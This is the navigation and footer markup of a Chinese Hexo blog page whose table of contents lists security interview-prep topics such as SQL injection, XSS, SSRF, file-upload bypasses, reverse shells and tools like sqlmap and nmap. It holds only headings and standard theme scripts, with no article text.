class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E8%BF%87%E6%BB%A4"><span class="nav-text">端口过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Http%E6%A8%A1%E5%BC%8F%E8%BF%87%E6%BB%A4"><span class="nav-text">Http模式过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%AC%A6%E4%B8%BA-and-or-not"><span class="nav-text">逻辑运算符为 and&#x2F;or&#x2F;not</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF"><span class="nav-text">MSF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8"><span class="nav-text">使用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux%E5%91%BD%E4%BB%A4"><span class="nav-text">Linux命令</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-text">反弹shell</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OSI%E6%A8%A1%E5%9E%8B"><span class="nav-text">OSI模型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TCP-IP%E4%BA%94%E5%B1%82%E6%A8%A1%E5%9E%8B"><span class="nav-text">TCP&#x2F;IP五层模型</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8C%BA%E5%88%AB"><span class="nav-text">区别</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss%EF%BC%8Ccsrf%EF%BC%8Cssrf%E5%8C%BA%E5%88%AB"><span class="nav-text">xss，csrf，ssrf区别</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">P1taya</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            
                <span class="count-box border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">79.9k</span>
                </span>
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%A2%E8%AF%95prepare"><span class="nav-text">面试prepare</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="nav-text">sql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%85%B3%E7%B3%BB%E5%9E%8B%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-text">常见的关系型数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B%EF%BC%9F"><span class="nav-text">SQL注入有哪几种注入类型？</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8D%B1%E5%AE%B3%E5%8F%8A%E9%98%B2%E5%BE%A1"><span class="nav-text">SQL注入的危害及防御</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5getshell"><span class="nav-text">sql注入getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="nav-text">绕过方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss"><span class="nav-text">xss</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%AA%8C%E8%AF%81%E5%AD%98%E5%9C%A8xss%E6%BC%8F%E6%B4%9E"><span class="nav-text">如何验证存在xss漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E7%B1%BB%E5%9E%8B"><span class="nav-text">xss有哪几种类型</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#DOM%E5%9E%8BXSS"><span class="nav-text">DOM型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E6%80%A7%E5%9E%8BXSS"><span class="nav-text">反射性型XSS</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="nav-text">存储型XSS</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E5%8D%B1%E5%AE%B3"><span class="nav-text">xss危害</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss%E4%BF%AE%E5%A4%8D"><span class="nav-text">xss修复</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-text">绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf"><span class="nav-text">ssrf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-1"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%B1%E5%AE%B3"><span class="nav-text">危害</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F"><span class="nav-text">利用方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-1"><span class="nav-text">绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1%E6%96%B9%E5%BC%8F"><span class="nav-text">防御方式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="nav-text">基本概念</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E6%96%B9%E5%BC%8F"><span class="nav-text">文件上传漏洞方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87-2"><span class="nav-text">绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#htaccess%E6%96%87%E4%BB%B6"><span class="nav-text">.htaccess文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#user-ini"><span class="nav-text">.user.ini</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%89%8D%E7%AB%AFjs%E7%BB%95%E8%BF%87"><span class="nav-text">前端js绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%BB%91%E7%99%BD%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0"><span class="nav-text">黑白名单绕过可以上传</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9content-type-%E6%B7%BB%E5%8A%A0GIF89a%E5%A4%B4"><span class="nav-text">修改content-type,添加GIF89a头</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#csrf"><span class="nav-text">csrf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-2"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B2%E5%BE%A1"><span class="nav-text">防御</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XXE"><span class="nav-text">XXE</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap"><span class="nav-text">sqlmap</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4"><span class="nav-text">常用指令</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#AWVS"><span class="nav-text">AWVS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%9F%E8%83%BD%E7%89%B9%E7%82%B9"><span class="nav-text">功能特点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86"><span class="nav-text">工作原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A1%B5%E9%9D%A2%E4%BB%8B%E7%BB%8D"><span class="nav-text">页面介绍</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#APPSCAN"><span class="nav-text">APPSCAN</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D-1"><span class="nav-text">介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86-1"><span class="nav-text">工作原理</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark"><span class="nav-text">wireshark</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BD%AF%E4%BB%B6%E5%8A%9F%E8%83%BD"><span class="nav-text">软件功能</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BD%AF%E4%BB%B6%E5%8E%9F%E7%90%86"><span class="nav-text">软件原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4"><span class="nav-text">过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%8F%E8%AE%AE%E8%BF%87%E6%BB%A4"><span class="nav-text">协议过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ip%E8%BF%87%E6%BB%A4"><span class="nav-text">ip过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E8%BF%87%E6%BB%A4"><span class="nav-text">端口过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Http%E6%A8%A1%E5%BC%8F%E8%BF%87%E6%BB%A4"><span class="nav-text">Http模式过滤</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%BB%E8%BE%91%E8%BF%90%E7%AE%97%E7%AC%A6%E4%B8%BA-and-or-not"><span class="nav-text">逻辑运算符为 and&#x2F;or&#x2F;not</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-text">nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF"><span class="nav-text">MSF</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%80%E4%BB%8B"><span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8"><span class="nav-text">使用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux%E5%91%BD%E4%BB%A4"><span class="nav-text">Linux命令</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-text">反弹shell</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OSI%E6%A8%A1%E5%9E%8B"><span class="nav-text">OSI模型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TCP-IP%E4%BA%94%E5%B1%82%E6%A8%A1%E5%9E%8B"><span class="nav-text">TCP&#x2F;IP五层模型</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8C%BA%E5%88%AB"><span class="nav-text">区别</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss%EF%BC%8Ccsrf%EF%BC%8Cssrf%E5%8C%BA%E5%88%AB"><span class="nav-text">xss，csrf，ssrf区别</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/toggle-theme.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/code-block.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/local-search.js"></script>


<!-- lazyload -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/lazyload.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/post-helper.js"></script>

        <!-- toc -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/toc.js"></script>
        

        <!-- copyright-info -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/copyright-info.js"></script>
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



    
        
    

</body>
</html>
